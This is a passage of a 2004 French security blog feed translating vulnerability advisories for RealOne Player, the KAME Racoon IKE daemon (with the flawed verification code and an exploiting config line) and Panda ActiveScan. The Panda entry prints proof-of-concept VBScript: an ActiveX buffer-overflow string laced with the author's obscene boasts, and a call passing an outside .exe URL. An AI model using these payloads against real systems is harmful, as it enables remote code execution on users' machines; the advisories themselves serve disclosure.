&lt;br /&gt;&lt;br /&gt;Aucune solution connue. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Manuel Lopez &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040412-001.html &lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108445851025015105?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445851025015105'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445851025015105'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108445851025015105' title='NewsPHP Admin Access and Cross Site Scripting Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108445840707680957</id><published>2004-05-13T16:25:00.000+02:00</published><updated>2004-05-13T16:27:51.286+02:00</updated><title type='text'>REAL One Player R3T File Format Stack Overflow Vulnerability </title><content type='html'>Sujet: REAL One Player R3T File Format Stack Overflow Vulnerability &lt;br /&gt;Versions: Real One Player toutes versions &lt;br /&gt;Auteur: Mark Litchfield &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 7 avril 2004 &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Description &lt;br /&gt;*********** &lt;br /&gt;RealOne/RealPlayer est un des produits les plus utilisés pour la lecture de media via Internet. Il y a actuellement plus de 200 millions d'utilisateurs dans le monde. &lt;br /&gt;&lt;br /&gt;Details &lt;br /&gt;******* &lt;br /&gt;En créant un fichier .R3T hybride, il est possible de créer un débordement de la pile dans RealOne/RealPlayer. En forçant l'affichage d'une fenêtre du navigateur sur une page Web contenant le fichier, du code peut être exécuté sur la machine cible, au cas où l'utilisateur est connecté. Autrement, un fichier joint à un email peut contenir le fichier et l'utilisateur l'exécute en ouvrant la pièce jointe. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit disponible. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Ne pas utiliser RealOnePlayer. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Mark Litchfield &lt;br /&gt;Traducteur FR: ThickParasite&lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040407-000.html &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108445840707680957?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445840707680957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108445840707680957'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108445840707680957' title='REAL One Player R3T File Format Stack Overflow Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108399345679798237</id><published>2004-05-08T07:16:00.000+02:00</published><updated>2004-05-08T07:22:05.716+02:00</updated><title type='text'>KAME IKE Daemon Racoon RSA Signature Authentication Vulnerability </title><content type='html'>Sujet: KAME IKE Daemon Racoon RSA Signature Authentication Vulnerability &lt;br /&gt;Versions: KAME IKE Daemon Racoon &lt;br /&gt;Auteur: Ralf Spenneberg &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 8 avril 2004 &lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Résumé : &lt;br /&gt;******** &lt;br /&gt;Le Racoon KAME IKE Daemon identifie l'utilisateur pendant la Phase 1 en utilisant des clefs pré-partagées, signatures RSA ou GSS-API. Quand des signatures RSA sont utilisées, Racoon valide le certificat X.509 utilisé par l'utilisateur mais pas la signature RSA. Si l'utilisateur envoie un certificat valide X.509 pendant la phase 1, n'importe quelle clef peut être utilisée pour générer une signature RSA. L'indentification sera réussie. &lt;br /&gt;&lt;br /&gt;Impact : &lt;br /&gt;******** &lt;br /&gt;Très fort ! Le Racoon est l'IKE Daemon le plus utilisé sur les plateformes BSD et sur le noyau natif de la pile Linux kernel IPsec 2.6. Si l'agresseur a accès à une clef valide du certificat X.509, il peut établir une connection IPsec au Racoon et démarrer son attaque. &lt;br /&gt;&lt;br /&gt;-------------------------------------------------------------------------------------------------------------------------------&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit nécessaire. Le Racoon lui-même peut-être utilisé pour exploiter cette faille de sécurité. La ligne de configuration importante : &lt;br /&gt;certificate_type x509 certificate badprivatekey; &lt;br /&gt;Si le certificat est validé par le Racoon cible, l'agresseur peut se connecter en utilisant n'importe quelle "badprivatekey". &lt;br /&gt;&lt;br /&gt;Description technique : &lt;br /&gt;*********************** &lt;br /&gt;In function eay_rsa_verify() in file crypto_openssl.c: &lt;br /&gt;[...] &lt;br /&gt;evp = d2i_PUBKEY(NULL, &amp;bp, pubkey-&gt;l); &lt;br /&gt;if (evp == NULL) &lt;br /&gt;return 0; &lt;br /&gt;[...] &lt;br /&gt;Dans ce contexte, la fonction d2i_PUBKEY renvoie toujours un NULL. La fonction revient alors avec le code 0 (succès). La verification de la signature ne se fait pas. &lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Mise à jour nécessaire. Il n'y a pas de contournement connu. &lt;br /&gt;Pour les produits ipsec : http://ipsec-tools.sf.net &lt;br /&gt;KAME : voir le CVS &lt;br /&gt;Gentoo a publié son advisory &lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Ralf Spenneberg &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040408-000.html &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108399345679798237?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108399345679798237'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108399345679798237'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108399345679798237' title='KAME IKE Daemon Racoon RSA Signature Authentication Vulnerability '/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry><entry><id>tag:blogger.com,1999:blog-6913127.post-108399303427035915</id><published>2004-05-08T07:09:00.000+02:00</published><updated>2004-05-08T07:23:06.263+02:00</updated><title type='text'>Panda ActiveScan Buffer Overflow and Denial of Service Vulnerability</title><content type='html'>Sujet: Panda ActiveScan Buffer Overflow and Denial of Service Vulnerability &lt;br /&gt;Versions: Panda ActivScan 5.0 &lt;br /&gt;Auteur: Rafel Ivgi, The-Insider &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Date: 6 avril 2004 &lt;br /&gt;&lt;br /&gt;1 | Détails |&lt;br /&gt;2 | Exploit |&lt;br /&gt;3 | Solution |&lt;br /&gt;4 | Copyrights | &lt;br /&gt;&lt;br /&gt;| Détails |&lt;br /&gt;&lt;br /&gt;Introduction : &lt;br /&gt;************** &lt;br /&gt;Panda ActivScan 5.0 est un utilitaire gratuit permettant de détecter et d'éliminer les virus. Il détecte et élimine plus de 66.000 virus. Il scan les emails et fichiers compressés. Il se met à jour quotidiennement et il averti dès que de nouvelles menaces apparaissent. &lt;br /&gt;&lt;br /&gt;Bug : &lt;br /&gt;***** &lt;br /&gt;Panda ActiveScan 5.0 installe et enregistre "ascontrol.dll" qui contient les objets COM suivants : &lt;br /&gt;ASControl Type Library: &lt;br /&gt;{A52FF42A-9D92-4C41-B3B7-87EBB1B84839} &lt;br /&gt;ASControl.ReportHebrew.1(any language) - &lt;br /&gt;{237AFA6B-D75C-445B-9D87-68DB699FAB32} &lt;br /&gt;ASControls.InstallEngineCtl.1 - &lt;br /&gt;{6E449683-C509-11CF-AAFA-00AA00B6015C} &lt;br /&gt;ASControl.Seleccion.1 - &lt;br /&gt;{6CEC0297-FAFB-41FB-97EA-77E3081B1DFE} &lt;br /&gt;ASControl.Lista.1 - &lt;br /&gt;{4826196E-5CD9-4029-A1D3-789D4651D2C2} &lt;br /&gt;ASControl.ControlConexion.1 - &lt;br /&gt;{6FDCDD41-6C97-4A3B-9E6D-0144B66A1CE4} &lt;br /&gt;&lt;br /&gt;Après la première utilisation d'activeScan, ce type &lt;br /&gt;d'objet peut être créé en local et à distance ! Ceci affectera probablement &lt;br /&gt;probablement tout autre langage de rapport des objets. &lt;br /&gt;&lt;br /&gt;Par exemple : &lt;br /&gt;Set object = CreateObject("ASControl.ReportHebrew.1" ) &lt;br /&gt;&lt;br /&gt;La vulnérabilité apparaît dans la propriété "International" de l'objet. Ce qui signifie que la tâche suivante : &lt;br /&gt;object.Internacional = [Long String - 'A'&gt;255] causera un &lt;br /&gt;buffer overflow, permettant à un utilisateur à distance d'exécuter du code arbitraire au niveau du système. &lt;br /&gt;&lt;br /&gt;Une autre vulnérabilité apparaît dans la fonction de "SetSitesFile" de l'objet Install Engine. Set object = CreateObject("ASControls.InstallEngineCtl.1" ) &lt;br /&gt;La fonction reçoit les paramètres suivants : &lt;br /&gt;object.SetSitesFile(url as string{must exist}, Region as const, language as &lt;br /&gt;const) &lt;br /&gt;Cependant, l’utilisation de cette fonction cause un crash du logiciel. Ce qui signifie que la tâche suivante : &lt;br /&gt;Set object = CreateObject("ASControls.InstallEngineCtl.1" ) &lt;br /&gt;object.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew &lt;br /&gt;causera un crash du logiciel et fermera cette fenêtre d'Internet &lt;br /&gt;Explorer. &lt;br /&gt;&lt;br /&gt;* Addon : L'Antivirus Panda Titanium 7 n'offre pas le scan par &lt;br /&gt;le menu de bouton de souris d'intégration(click droit) aux caractères non-alphabétiques. &lt;br /&gt;&lt;br /&gt;Le Code : &lt;br /&gt;********* &lt;br /&gt;------------------- COUPER ICI ------------------- &lt;br /&gt;&lt;script language=vbscript&gt; &lt;br /&gt;dim mymy &lt;br /&gt;Set mymy = CreateObject("ASControl.ReportHebrew.1" ) &lt;br /&gt;&lt;br /&gt;a="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA &lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA &lt;br /&gt;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" &lt;br /&gt;a= a &amp; &lt;br /&gt;"ABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB &lt;br /&gt;BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB &lt;br /&gt;BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB" &lt;br /&gt;a= a &amp; &lt;br /&gt;"BCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC &lt;br /&gt;CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC &lt;br /&gt;CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC" &lt;br /&gt;a= a &amp; &lt;br /&gt;"CDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD &lt;br /&gt;DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD &lt;br /&gt;DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD" &lt;br /&gt;a= a &amp; &lt;br /&gt;"DEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE &lt;br /&gt;EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE &lt;br /&gt;EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" &lt;br /&gt;a= a &amp; &lt;br /&gt;"EFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF &lt;br /&gt;FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF &lt;br /&gt;FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF" &lt;br /&gt;a= a &amp; &lt;br /&gt;"FGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG &lt;br /&gt;GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG &lt;br /&gt;GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG" &lt;br /&gt;a= a &amp; &lt;br /&gt;"GHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH &lt;br /&gt;HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH &lt;br /&gt;HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH" &lt;br /&gt;a= a &amp; &lt;br /&gt;"HIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII &lt;br /&gt;IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII &lt;br /&gt;IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIII" &lt;br /&gt;a= a &amp; &lt;br /&gt;"IJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ &lt;br /&gt;JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ &lt;br /&gt;JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ" &lt;br /&gt;a= a &amp; &lt;br /&gt;"JKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK &lt;br /&gt;KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK &lt;br /&gt;KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK" &lt;br /&gt;a= a &amp; &lt;br /&gt;"KLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL &lt;br /&gt;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL &lt;br /&gt;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLL" &lt;br /&gt;a= a &amp; &lt;br /&gt;"LMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM &lt;br /&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM &lt;br /&gt;MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM &lt;br /&gt;MMMMMM" &lt;br /&gt;a= a &amp; &lt;br /&gt;"M1234567899876543211112222333344445555666677778888999998761234rafiistheking &lt;br /&gt;ofthebufferoverflowsoyoucansuckmydickcauseiamtheinsiderandiamthebestgolookfo &lt;br /&gt;ryou9999endsinthenextdooryoufuckedupmotherfuckersokdontevenanswermeyouputawh &lt;br /&gt;ythehelldoyouthinkyoucancodethisamazingexploitofthepandaantiv55usstupidteamh &lt;br /&gt;asoliudieyuisverygoodininternetexplorerandiwillsoonbesogoodtorafiterdayihadl &lt;br /&gt;auchinazasowhatareyougoingtodoaboutitNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN &lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN &lt;br /&gt;NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN &lt;br /&gt;NNNNNNNNN" &lt;br /&gt;a= a &amp; &lt;br /&gt;"NOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO &lt;br /&gt;OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO &lt;br /&gt;OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO" &lt;br /&gt;a= a &amp; &lt;br /&gt;"OPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP &lt;br /&gt;PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP &lt;br /&gt;PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP" &lt;br /&gt;a= a &amp; &lt;br /&gt;"PQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ &lt;br /&gt;QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ &lt;br /&gt;QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ" &lt;br /&gt;a= a &amp; &lt;br /&gt;"QRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR &lt;br /&gt;RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR &lt;br /&gt;RRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR" &lt;br /&gt;a= a &amp; &lt;br /&gt;"RSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS &lt;br /&gt;SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS &lt;br /&gt;SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS" &lt;br /&gt;a= a &amp; &lt;br /&gt;"STTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT &lt;br /&gt;TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT &lt;br /&gt;TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT" &lt;br /&gt;a= a &amp; &lt;br /&gt;"TUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU &lt;br /&gt;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU &lt;br /&gt;UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU" &lt;br /&gt;a= a &amp; &lt;br /&gt;"UVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV &lt;br /&gt;VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV &lt;br /&gt;VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV" &lt;br /&gt;a= a &amp; &lt;br /&gt;"VWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW &lt;br /&gt;WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW &lt;br /&gt;WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW &lt;br /&gt;WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW" &lt;br /&gt;a= a &amp; &lt;br /&gt;"WXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX &lt;br /&gt;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX &lt;br /&gt;XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" &lt;br /&gt;a= a &amp; &lt;br /&gt;"XYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY &lt;br /&gt;YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY &lt;br /&gt;YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY" &lt;br /&gt;a= a &amp; &lt;br /&gt;"YZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ &lt;br /&gt;ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ &lt;br /&gt;ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ" &lt;br /&gt;&lt;br /&gt;mymy.Internacional a &lt;br /&gt;&lt;/script&gt; &lt;br /&gt;------------------- COUPER ICI ------------------- &lt;br /&gt;&lt;br /&gt;et &lt;br /&gt;&lt;br /&gt;------------------- COUPER ICI ------------------- &lt;br /&gt;&lt;script language=vbscript&gt; &lt;br /&gt;dim mymy &lt;br /&gt;Set mymy = CreateObject("ASControls.InstallEngineCtl.1" ) &lt;br /&gt;mymy.SetSitesFile "http://rafiwarez.tripod.com/ncx.exe", ASIA, hebrew &lt;br /&gt;&lt;/script&gt; &lt;br /&gt;------------------- COUPER ICI ------------------- &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;| Exploit |&lt;br /&gt;&lt;br /&gt;Aucun exploit connu à ce jour. &lt;br /&gt;&lt;br /&gt;| Solution |&lt;br /&gt;&lt;br /&gt;Aucune solution proposée. &lt;br /&gt;&lt;br /&gt;| Copyrights |&lt;br /&gt;&lt;br /&gt;Auteur: Rafel Ivgi, The-Insider &lt;br /&gt;Traducteur FR: ThickParasite &lt;br /&gt;Référence: http://www.security-corporation.com/articles-20040406-000.html &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6913127-108399303427035915?l=securite-informatique.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108399303427035915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6913127/posts/default/108399303427035915'/><link rel='alternate' type='text/html' href='http://securite-informatique.blogspot.com/2004_05_01_archive.html#108399303427035915' title='Panda ActiveScan Buffer Overflow and Denial of Service Vulnerability'/><author><name>Laurent Bourrelly</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='31' src='http://2.bp.blogspot.com/_OwTx7asSx4E/SvNo6y3ht-I/AAAAAAAAAGE/gBp1sp1tgRc/S220/avatar_150.jpg'/></author></entry></feed>
